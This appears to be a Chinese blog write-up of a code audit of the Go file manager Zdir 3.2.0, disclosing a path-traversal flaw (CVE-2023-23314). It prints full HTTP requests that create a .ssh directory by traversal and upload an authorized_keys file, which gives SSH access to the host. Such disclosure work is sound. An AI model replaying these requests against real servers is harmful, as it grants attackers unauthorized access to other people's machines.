Go代码审计-Zdir

成功获取到垃圾的CVE编号：cve-2023-23314

安装

zdir 版本: 3.2.0

git clone https://github.com/helloxz/zdir

go run main.go init

在 data/config/config.ini 设置 public_path

public_path=data/public

启动

go run main.go start

审计流程

查看路由，发现创建目录和上传都需要登录

跟进 controller.Mkdir 方法，post 请求提交的参数是 name 和 path

跟进 !V_dir 方法，发现只是判断传的路径是否为文件夹这样就可以利用目录穿越创建一个 .ssh 目录

POST /api/dir/create HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 28
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Token: 433a01baeaa6c37ef46f21621cc06f95
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: application/json, text/plain, */*
X-Cid: bPlNFG
sec-ch-ua-platform: "Linux"
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

path=/../../../../&name=.ssh

跟进 controller.Upload 方法，可以自定义上传的路径

//如果上传路径不合法
	//判断用户传递的路径是否合法
	var validPath = regexp.MustCompile(`^(\.|\..).+`)
	v_re := validPath.MatchString(path)
	if v_re {
		c.JSON(200, gin.H{
			"code": -1000,
			"msg":  "文件夹名称不合法！",
			"data": "",
		})
		c.Abort()
		return
	}

判断路径是否合法的正则有漏洞，可以利用 /../ 进行绕过

判断文件夹是否存在，不存在就终止执行。所以利用上面的目录穿越创建文件夹，然后就是文件名不进行重命名直接进行了上传。

POST /api/upload HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 897
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqjo68lEJ6LlJ8zdA
X-Token: 433a01baeaa6c37ef46f21621cc06f95
X-Cid: bPlNFG
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="path"

/../../../../../../home/kali/.ssh
------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="file"; filename="authorized_keys"
Content-Type: text/plain

ssh-rsa

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA--

生成一个 ssh 公钥，进行上传

然后就可以利用 ssh 进行连接服务器了

安装

审计流程

Related Posts